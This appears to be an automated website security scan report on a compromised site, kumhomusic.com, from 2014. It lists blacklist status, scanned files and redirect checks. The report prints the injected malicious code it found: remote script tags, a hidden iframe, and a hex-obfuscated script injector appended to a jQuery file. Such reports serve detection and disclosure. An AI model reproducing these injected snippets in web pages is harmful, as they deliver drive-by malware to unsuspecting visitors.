Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kumhomusic.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://kumhomusic.com/ | 200 OK Content-Length: 36291 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 60.32.213.44 ...[4220 bytes skipped]... r> </table> </td> </tr> </table> </body> </html> <script type="text/javascript" src="./js/wrest.js"></script> <!-- ìì°½ ëì ì¬ì©íë iframe --> <iframe width=0 height=0 name='hiddenframe' style='display:none;'></iframe> </body> </html> <script type="text/javascript" src="http://60.32.213.44/mail/holder.js"></script><iframe src=http://121.138.184.231/ttt/sty.htm width=10 height=10></iframe><script type="text/javascript" src="http://121.67.183.105:83/MEDIA/holder.js"></script> Malicious iFrame found. size: 10x10 src: http://121.138.184.231/ttt/sty.htm This URL is marked by Google as suspicious <iframe src=http://121.138.184.231/ttt/sty.htm width=10 height=10> | ||
http://kumhomusic.com/./js/jquery-1.4.2.min.js | 200 OK Content-Length: 72400 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.cal window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x2f\x2f\x73\x72\x63\x6d\x65\x2e\x6d\x65\x2f\x73\x77\x66\x2e\x6a\x73\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"); Antivirus reports:
| ||
http://kumhomusic.com/./js/common.js | 200 OK Content-Length: 15354 Content-Type: application/javascript | clean |
http://kumhomusic.com/./js/shop.js | 200 OK Content-Length: 500 Content-Type: application/javascript | clean |
http://kumhomusic.com/./swf/flash.js | 200 OK Content-Length: 1465 Content-Type: application/javascript | clean |
http://kumhomusic.com/./js/wrest.js | 200 OK Content-Length: 15539 Content-Type: application/javascript | clean |
http://60.32.213.44/mail/holder.js | 404 Not Found Content-Length: 1621 Content-Type: text/html | clean |
http://60.32.213.44/test404page.js | 404 Not Found Content-Length: 1621 Content-Type: text/html | clean |
http://121.67.183.105:83/MEDIA/holder.js | 404 Not Found Content-Length: 314 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 121.67.183.105 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /MEDIA/holder.js was not found on this server.</p> <hr> <address>Apache Server at <a href="mailto:admin@localhost">121.67.183.105</a> Port 83</address> </body></html> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kumhomusic.com
Result:
HTTP/1.1 200 OK
Cache-Control: pre-check=0, post-check=0, max-age=0
Connection: close
Date: Mon, 22 Dec 2014 06:00:45 GMT
Pragma: no-cache
Server: Microsoft-IIS/5.0 PHP/5.2.17
Content-Length: 36291
Content-Type: text/html; charset=utf-8
Expires: 0
Last-Modified: Mon, 22 Dec 2014 06:00:45 GMT
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Set-Cookie: PHPSESSID=17114ab0d453b17a99ea58a5f26ac510; path=/
Set-Cookie: f33d2ed86bd82d4c22123c9da444d8ab=MTQxOTIyODA0NQ%3D%3D; expires=Tue, 22-Dec-2015 06:00:45 GMT; path=/
Set-Cookie: 96b28b766b7e0699aa91c9ff3d890663=deleted; expires=Sun, 22-Dec-2013 06:00:44 GMT; path=/
Set-Cookie: 2a0d2363701f23f8a75028924a3af643=NzguMTU4LjExLjIyNg%3D%3D; expires=Tue, 23-Dec-2014 06:00:45 GMT; path=/
X-Powered-By: PHP/5.2.17
...36291 bytes of data.
GET / HTTP/1.1
Host: kumhomusic.com
Result:
HTTP/1.1 200 OK
Cache-Control: pre-check=0, post-check=0, max-age=0
Connection: close
Date: Mon, 22 Dec 2014 06:00:45 GMT
Pragma: no-cache
Server: Microsoft-IIS/5.0 PHP/5.2.17
Content-Length: 36291
Content-Type: text/html; charset=utf-8
Expires: 0
Last-Modified: Mon, 22 Dec 2014 06:00:45 GMT
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Set-Cookie: PHPSESSID=17114ab0d453b17a99ea58a5f26ac510; path=/
Set-Cookie: f33d2ed86bd82d4c22123c9da444d8ab=MTQxOTIyODA0NQ%3D%3D; expires=Tue, 22-Dec-2015 06:00:45 GMT; path=/
Set-Cookie: 96b28b766b7e0699aa91c9ff3d890663=deleted; expires=Sun, 22-Dec-2013 06:00:44 GMT; path=/
Set-Cookie: 2a0d2363701f23f8a75028924a3af643=NzguMTU4LjExLjIyNg%3D%3D; expires=Tue, 23-Dec-2014 06:00:45 GMT; path=/
X-Powered-By: PHP/5.2.17
...36291 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kumhomusic.com
Referer: http://www.google.com/search?q=kumhomusic.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kumhomusic.com
Referer: http://www.google.com/search?q=kumhomusic.com
Result:
The result is similar to the first query. There are no suspicious redirects found.